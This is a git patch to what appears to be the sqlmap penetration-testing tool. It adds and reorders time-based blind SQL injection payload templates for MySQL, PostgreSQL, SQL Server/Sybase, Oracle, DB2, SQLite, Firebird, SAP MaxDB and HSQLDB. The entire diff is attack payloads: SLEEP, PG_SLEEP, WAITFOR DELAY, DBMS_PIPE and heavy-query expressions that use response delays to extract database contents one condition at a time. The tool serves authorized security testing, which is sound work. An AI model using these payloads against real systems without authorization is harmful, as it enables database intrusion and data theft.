From b2fca35c3684a8e02e8f444524dd33f652b04a62 Mon Sep 17 00:00:00 2001 From: "Bernardo Damele A. G." Date: Tue, 3 Mar 2015 14:22:20 +0000 Subject: [PATCH] consolidated some time-based blind payloads - issue #1169 --- xml/payloads/05_time_blind.xml | 954 +++++++++++++++++++++------------ 1 file changed, 599 insertions(+), 355 deletions(-) diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml index 2cec7931e..95a6f5160 100644 --- a/xml/payloads/05_time_blind.xml +++ b/xml/payloads/05_time_blind.xml @@ -1,7 +1,7 @@ - + MySQL > 5.0.11 AND time-based blind (SELECT) 5 @@ -22,10 +22,30 @@ + + MySQL > 5.0.11 OR time-based blind (SELECT) + 5 + 1 + 3 + 1,2,3 + 1 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + > 5.0.11 +
+ + MySQL > 5.0.11 AND time-based blind (SELECT - comment) 5 - 4 + 3 1 1,2,3 1 @@ -43,10 +63,31 @@ + + MySQL > 5.0.11 OR time-based blind (SELECT - comment) + 5 + 3 + 3 + 1,2,3 + 1 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + > 5.0.11 +
+ + MySQL > 5.0.11 AND time-based blind 5 - 1 + 2 1 1,2,3 1 @@ -63,6 +104,26 @@ + + MySQL > 5.0.11 OR time-based blind + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + + + + +
+ MySQL + > 5.0.11 +
+ + MySQL > 5.0.11 AND time-based blind (comment) 5 @@ -84,6 +145,27 @@ + + MySQL > 5.0.11 OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + > 5.0.11 +
+ + MySQL < 5.0.12 AND time-based blind (heavy query) 5 @@ -103,6 +185,25 @@ + + MySQL < 5.0.12 OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL +
+ + MySQL < 5.0.12 AND time-based blind (heavy query - comment) 5 @@ -123,6 +224,26 @@ + + MySQL < 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL +
+ + PostgreSQL > 8.1 AND time-based blind 5 @@ -143,10 +264,30 @@ + + PostgreSQL > 8.1 OR time-based blind + 5 + 1 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+ + PostgreSQL > 8.1 AND time-based blind (comment) 5 - 5 + 4 1 1,2,3 1 @@ -164,10 +305,31 @@ + + PostgreSQL > 8.1 OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+ + PostgreSQL AND time-based blind (heavy query) 5 - 3 + 2 2 1,2,3 1 @@ -183,6 +345,25 @@ + + PostgreSQL OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+ + PostgreSQL AND time-based blind (heavy query - comment) 5 @@ -203,6 +384,26 @@ + + PostgreSQL OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+ + Microsoft SQL Server/Sybase time-based blind 5 @@ -211,6 +412,27 @@ 0 1 IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase + Windows +
+ + + + Microsoft SQL Server/Sybase time-based blind (comment) + 5 + 4 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' WAITFOR DELAY '0:0:[SLEEPTIME]' -- @@ -246,6 +468,27 @@ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase + Windows +
+ + Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) 5 @@ -268,6 +511,28 @@ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase + Windows +
+ + Oracle AND time-based blind 5 @@ -287,10 +552,29 @@ + + Oracle OR time-based blind + 5 + 1 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+ + Oracle AND time-based blind (comment) 5 - 5 + 4 1 1,2,3 1 @@ -307,6 +591,26 @@ + + Oracle OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+ + Oracle AND time-based blind (heavy query) 5 @@ -326,6 +630,25 @@ + + Oracle OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+ + Oracle AND time-based blind (heavy query - comment) 5 @@ -346,6 +669,104 @@ + + Oracle OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+ + + + IBM DB2 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+ + + + IBM DB2 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+ + + + IBM DB2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+ + + + IBM DB2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+ + SQLite > 2.0 AND time-based blind (heavy query) 5 @@ -366,6 +787,26 @@ + + SQLite > 2.0 OR time-based blind (heavy query) + 5 + 3 + 3 + 1 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+ + SQLite > 2.0 AND time-based blind (heavy query - comment) 5 @@ -387,6 +828,27 @@ + + SQLite > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+ + Firebird AND time-based blind (heavy query) 5 @@ -407,6 +869,26 @@ + + Firebird OR time-based blind (heavy query) + 5 + 4 + 3 + 1 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+ + Firebird AND time-based blind (heavy query - comment) 5 @@ -428,10 +910,31 @@ + + Firebird OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+ + SAP MaxDB AND time-based blind (heavy query) 5 - 3 + 4 2 1,2,3 1 @@ -447,6 +950,25 @@ + + SAP MaxDB OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+ + SAP MaxDB AND time-based blind (heavy query - comment) 5 @@ -468,44 +990,25 @@ - IBM DB2 AND time-based blind (heavy query) - 5 - 3 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - - - - -
- IBM DB2 -
- - - - IBM DB2 AND time-based blind (heavy query - comment) + SAP MaxDB OR time-based blind (heavy query - comment) 5 5 - 2 + 3 1,2,3 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) --
- IBM DB2 + SAP MaxDB
- + HSQLDB >= 1.7.2 AND time-based blind (heavy query) 5 @@ -526,6 +1029,26 @@ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+ + HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment) 5 @@ -546,7 +1069,28 @@ >= 1.7.2 - + + + HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+ + HSQLDB > 2.0 AND time-based blind (heavy query) 5 @@ -567,6 +1111,26 @@ + + HSQLDB > 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+ + HSQLDB > 2.0 AND time-based blind (heavy query - comment) 5 @@ -587,332 +1151,12 @@ > 2.0 - - - - - - MySQL > 5.0.11 OR time-based blind (SELECT) - 5 - 1 - 3 - 1,2,3 - 2 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - > 5.0.11 -
- - - - MySQL > 5.0.11 OR time-based blind (SELECT - comment) - 5 - 4 - 3 - 1,2,3 - 2 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - > 5.0.11 -
- - - - MySQL > 5.0.11 OR time-based blind - 5 - 2 - 3 - 1,2,3 - 2 - OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - OR [RANDNUM]=SLEEP([SLEEPTIME]) - - - - -
- MySQL - > 5.0.11 -
- - - - MySQL < 5.0.12 OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - - OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - - - - -
- MySQL -
- - - - PostgreSQL > 8.1 OR time-based blind - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) - - - - -
- PostgreSQL - > 8.1 -
- - - - PostgreSQL OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) - - - - -
- PostgreSQL -
- - - - Microsoft SQL Server/Sybase OR time-based blind (heavy query) - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) - - - - -
- Microsoft SQL Server - Sybase - Windows -
- - - - Oracle OR time-based blind - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) - - OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) - - - - -
- Oracle -
- - - - Oracle OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) - - - - -
- Oracle -
- - - - SQLite > 2.0 OR time-based blind (heavy query) - 5 - 4 - 3 - 1 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) - - OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) - - - - -
- SQLite - > 2.0 -
- - - - Firebird OR time-based blind (heavy query) - 5 - 5 - 3 - 1 - 2 - OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) - - OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) - - - - -
- Firebird - >= 2.0 -
- - - - SAP MaxDB OR time-based blind (heavy query - comment) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - - OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) - - - - -
- SAP MaxDB -
- - - - IBM DB2 OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - - - - -
- IBM DB2 -
- - - - HSQLDB >= 1.7.2 OR time-based blind (heavy query) - 5 - 4 - 2 - 1,2,3 - 1 - OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END - - OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) - - - - -
- HSQLDB - >= 1.7.2 -
- - - - HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END - - OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) - -- - - - - -
- HSQLDB - >= 1.7.2 -
- - - - HSQLDB > 2.0 OR time-based blind (heavy query) - 5 - 4 - 2 - 1,2,3 - 1 - OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END - - OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) - - - - -
- HSQLDB - > 2.0 -
- HSQLDB > 2.0 OR time-based blind (heavy query - comment) 5 5 - 2 + 3 1,2,3 1 OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END @@ -929,7 +1173,7 @@ - +